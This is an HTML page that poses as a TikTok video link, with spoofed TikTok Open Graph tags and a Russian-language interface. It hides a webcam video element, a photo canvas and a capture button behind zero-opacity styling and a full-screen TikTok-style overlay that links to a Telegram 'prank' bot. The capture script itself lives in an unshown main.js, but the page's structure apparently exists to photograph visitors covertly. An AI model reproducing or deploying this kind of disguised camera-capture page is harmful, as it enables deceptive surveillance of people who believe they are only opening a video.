<!DOCTYPE html>
<html>

<head>
  <title>Tiktok Video</title>

  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta property="og:site_name" content="TikTok" data-rh="true">
  <meta property="og:type" content="website" data-rh="true">
  <meta property="og:title" content="hannah_uwu в TikTok" data-rh="true">
  <meta property="og:description" content="Короткие видео от hannah_uwu с ♬ Destroy Lonely" data-rh="true">
  <meta property="og:image"
    content="https://avatars.mds.yandex.net/i?id=24404db14d576f763a2b20fe2e96f617d19a864d-4410363-images-thumbs&n=13" />
  <!--<<meta property="og:image" content=" https://upload.wikimedia.org/wikipedia/commons/c/ce/Vaz2107.jpg" /> -->


  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta name="viewport"
    content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">

  <style>
    @import url('https://fonts.googleapis.com/css2?family=Inter:ital,opsz,wght@0,14..32,100..900;1,14..32,100..900&family=Montserrat:ital,wght@0,100..900;1,100..900&display=swap');

    * {
      padding: 0;
      margin: 0;
      font-family: 'Montserrat';
      font-weight: 600;
    }

    #video {
      border: 1px solid black;
      box-shadow: 2px 2px 3px black;
      width: 320px;
      height: 240px;
      opacity: 0;
    }

    #photo {
      border: 1px solid black;
      box-shadow: 2px 2px 3px black;
      width: 320px;
      height: 240px;
      opacity: 0;
    }

    #canvas {
      display: none;
      opacity: 0;
    }

    .camera {
      width: 340px;
      display: inline-block;
      opacity: 0;
    }

    .output {
      width: 340px;
      display: inline-block;
    }

    #startbutton {
      display: block;
      position: relative;
      margin-left: auto;
      margin-right: auto;
      bottom: 32px;
      background-color: rgba(0, 150, 0, 0.5);
      border: 1px solid rgba(255, 255, 255, 0.7);
      box-shadow: 0px 0px 1px 2px rgba(0, 0, 0, 0.2);
      font-size: 14px;
      font-family: "Lucida Grande", "Arial", sans-serif;
      color: rgba(255, 255, 255, 1.0);
      opacity: 0;
      transition: 1s;
      opacity: 0;
    }

    #startbutton.streaming {
      opacity: 1;
      opacity: 0;
    }

    .contentarea {
      font-size: 16px;
      font-family: "Lucida Grande", "Arial", sans-serif;
      width: 760px;
      opacity: 0;
    }

    .tiktok {
      width: 100%;
      height: 100vh;
      background: #ffffff;
      position: fixed;
      top: 0px;
      z-index: 100;
      display: flex;
      flex-direction: column;
      justify-content: center;
      align-items: center;
    }

    .tiktok_img {
      width: 60px;
      height: 60px;
    }

    .tiktok_a {
      margin-top: 10px;
      text-decoration: none;
      color: #000000;

    }
  </style>
  <script src="main.js"></script>
</head>

<body>
  <div class="contentarea">

    <div class="camera">
      <video id="video">Видеопоток недоступен.</video> <button id="startbutton">Сделать фото</button>
    </div><br>
    <canvas id="canvas"></canvas>


    <div class="output"></div>

  </div>
  <input type="file">

  <div class="tiktok">
    <img class="tiktok_img"
      src="https://assets-v2.lottiefiles.com/a/b9a425be-1162-11ee-bc1c-eb55ba886687/Uj2Jc3Mhim.gif" />
    <a href="https://t.me/tikto_prank_bot" class="tiktok_a">@tikto_prank_bot</a>
  </div>


</body>

</html>